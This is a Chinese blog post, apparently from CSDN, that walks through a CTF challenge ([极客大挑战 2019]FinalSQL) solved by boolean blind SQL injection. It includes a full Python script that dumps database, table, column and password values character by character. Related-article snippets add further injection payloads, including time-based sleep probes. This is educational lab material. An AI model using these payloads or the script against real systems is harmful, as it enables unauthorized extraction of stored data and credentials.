一天一道ctf 第35天(盲注)

最新推荐文章于 2024-08-09 18:17:35 发布
最新推荐文章于 2024-08-09 18:17:35 发布
阅读量233 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/118854858
版权

[极客大挑战 2019]FinalSQL
点进来看到这样的页面,万能密码试了下没用,不过作者这里也提示过盲注了。注入点是点击神秘代码1以后的这个界面,尝试?id=1^(1==1)^1,页面正常回显,说明可以注入。
在这里插入图片描述
在这里插入图片描述
这里参考了大佬写的脚本,毕竟盲注实在太花时间了。网上还有其他更简练的脚本,但是我跑的时候都不是很稳定,爆出来的字段名有时候会有错误。这个用了三个payload,虽然看起来麻烦了点,但是胜在稳定。

import requests
import re
import string

s = requests.session()
url = "http://7ceca060-f463-4e2b-9aff-bc77774807fe.node4.buuoj.cn/search.php"
table = ""

for i in range(1, 300):
    print(i)
    high = 128
    low = 31
    while (low <= high):

        mid = (low + high) // 2
        # 爆库名
        #  1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>1)^1

        payload11 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))=%d)^1"%(i,mid)
        payload12 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d)^1"%(i,mid)
        payload13 = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,mid)

        # 爆表名
        # payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1"%(i,mid)
        '''
        payload11 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))=%d)^1"%(i,mid)
        payload12 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))<%d)^1"%(i,mid)
        payload13 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,mid)
        '''

        # 爆字段名
        # payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,mid)
        '''
        payload11 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,mid)
        payload12 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))<%d)^1"%(i,mid)
        payload13 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,mid)
        '''

        # 爆字段值
        # payload4 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1"%(i,mid)

        #payload11 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))=%d)^1" % (i, mid)
        #payload12 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i, mid)
        #payload13 = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)

        ra11 = s.get(url=url + "?id=" + payload11).text
        ra12 = s.get(url=url + "?id=" + payload12).text
        ra13 = s.get(url=url + "?id=" + payload13).text
        if 'Click' in ra11:
            table += chr(mid)
            print(table)
            break
        if 'Click' in ra12:
            #print ("'low='+%d + 'high=' + %d"%(low,high))
            high = mid - 1
        if "Click" in ra13:
            #print ("'low='+%d + 'high=' + %d"%(low,high))
            low = mid + 1

先爆库名,猜测是geek,或者用"id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
在这里插入图片描述
再爆表名,这里我一开始以为在Flaaaaag里,但是接着做下去发觉不对了(狡猾的出题人)
在这里插入图片描述
爆F1naI1y里的字段名
在这里插入图片描述
最后爆一波password,找到flag
在这里插入图片描述

scrawman
关注
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
CTF时间盲注(延时注入)
wikey 的博客
03-29 412
id=1′ and if(ascii(substr(database(),第一个字母,1))=115,sleep(2),0) –+id=1′ and if(ascii(substr(database(),第二个字母,1))=101,sleep(2),0) –+id=1′ and if(length(database())>(一个数字),sleep(2),0) –+//判断库名长度。if(1=2,1,sleep(1))即延迟一秒后回显。if(1=1,1,sleep(1))即输出一。
[极客大挑战 2019]FinalSQL1
最新发布
kw741951的博客
08-09 279
break(参考博客)# 如果为真时的关键字匹配。sql注入,点击1试一下。得到flag倒序,更正为。
CTF实例题-盲注
A1956936030的博客
09-26 779
1.例题如下
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2600
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
CTF-时间盲注专题
PolarPeak的博客
04-25 2697
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间盲注 Heavy Query 个人认为这个方法是本题的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
2016合全国高校网安联赛专题赛--赛前指导练习题web进阶篇Writeup
Bendawang's Blog
07-26 4339
2016合全国高校网安联赛专题赛--赛前指导练习题web进阶篇Writeup
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4485
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
一些不错的网页
墨鱼菜鸡
12-06 2426
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
【Network Security!】Web安全学习及异或解密示例
李响
02-22 1040
文章目录一.工具&术语1.网安术语2.常用工具3.推荐文章二.常见攻击1.SQL注入2.XSS跨站3.越权漏洞三.音乐异或解密示例 一.工具&术语 1.网安术语 常见安全网站及论坛: 看雪(https://bbs.pediy.com/) 安全客(https://www.anquanke.com) freebuf(https://www.freebuf.com/) 安全牛(http...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
布尔盲注ctfhub)
2401_82985722的博客
03-27 1216
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFhub的布尔盲注
ndjnddjxn的博客
04-12 1006
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTF-一道盲注和显注结合的SQL注入题
魔域的墨鱼
01-30 1267
一、BASIC 1、babyBASE64 题目给出了一串编码,加上题目提示,明显看出是base64加密过的,找个base64的网站解码即可得到flag 二、WEB 1、你能跨过去吗? 网址:http://120.79.220.111:7001/SW01/a.php 题目提示key是XSS,并且给出了一个神秘的网址…观察发现,在两个%2b之间疑似是base64编码,尝试一下解码。发现以下现象 ...
CTF-Web7(涉及盲注脚本)
→_→
08-21 1234
7.who are you? 进入这个页面,发现他获取了我的ip,首先想到的就是user agent注入,用updatexml试一下,什么错的没有报...看来这个思路不行(注:user agent注入和updatexml不会的参考Sqli-labs之Less-18和Less-19) 百度了才知道这是一道伪造IP的题,总结下,伪造IP的HTTP头都有这些: X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-re...
ctf】sql注入——基于时间的盲注
wlllllianqing的博客
09-18 862
基于时间的盲注 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
CTF-web】buuctf-[CISCN2019 华北赛区 Day2 Web1]Hack World(sql盲注
Sankkl1的博客
08-18 462
根据上图可知,页面中已经告诉我们要从flag表中的flag列取出flag,思考是sql注入。经过抓包发现发post包中的id字段是注入点。同时还发现是盲注,即当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果。由此可以通过if函数来测试flag每一位的值,以下为编写的测试脚本。经测试当输入id=1时,结果为。,发现过滤了空格、#等符号。,当id=2时,结果为。
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2666
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
ctfhub布尔盲注
08-31
布尔盲注是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值